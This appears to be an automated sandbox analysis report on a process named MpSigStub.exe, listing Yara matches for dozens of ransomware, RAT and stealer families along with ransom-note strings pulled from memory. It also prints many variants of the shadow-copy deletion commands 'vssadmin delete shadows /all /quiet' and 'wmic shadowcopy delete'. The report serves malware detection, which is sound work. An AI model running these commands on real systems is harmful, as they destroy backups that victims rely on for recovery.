Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: www.hotmail.com equals www.hotmail.com (Hotmail)
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected VBKeyloggerGeneric

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: WerFault.exe, 00000005.00000003.2855746195.000000000294D000.00000004.00000001.sdmp

Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut

Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected LazParking Ransomware

Show sources

Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected BlackMoon Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Zeppelin Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Ragnarok ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Apis Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Wannacry ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected MegaCortex Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Cobra Locker ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected RekenSom ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Avaddon Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Babuk Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Nemty Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected BLACKMatter Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Clay Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Thanos ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Jigsaw

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected CryLock ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Sapphire Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected OCT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Snatch Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected AESCRYPT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected RansomwareGeneric

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Silvertor Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Ouroboros ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Annabelle Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Gocoder ransomware

Show sources

Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY

Yara detected WannaRen ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Chaos Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Mock Ransomware

Show sources

Source: Yara match	File source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Conti ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6339772836.00000197A3E9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected NoCry Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected ByteLocker Ransomware

Show sources

Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected RegretLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Clop Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Ryuk ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Porn Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected LockBit ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected DarkSide Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected LOCKFILE ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Cerber ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected HiddenTear ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Rhino ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Mailto ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected CoronaCrypt Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Voidcrypt Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Buran Ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected GoGoogle ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected VHD ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Axiom Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Artemon Ransomware

Show sources

Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Netwalker ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Jcrypt Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Covid19 Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Delta Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected LokiLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Cryptolocker ransomware

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Marvel Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Cute Ransomware

Show sources

Source: Yara match	File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Xorist ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Found potential ransomware demand text

Show sources

Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible]

Found string related to ransomware

Show sources

Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Binary or memory string: &encrypted=

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Binary or memory string: HELP_instructions.html
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: HOW TO DECRYPT FILES.txt
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: How to decrypt files.html

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: cmd /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: 6vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: */C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet;wmic shadowcopy delete
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /All]
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin Delete Shadows /Quiet /All
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /all /quiet]

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
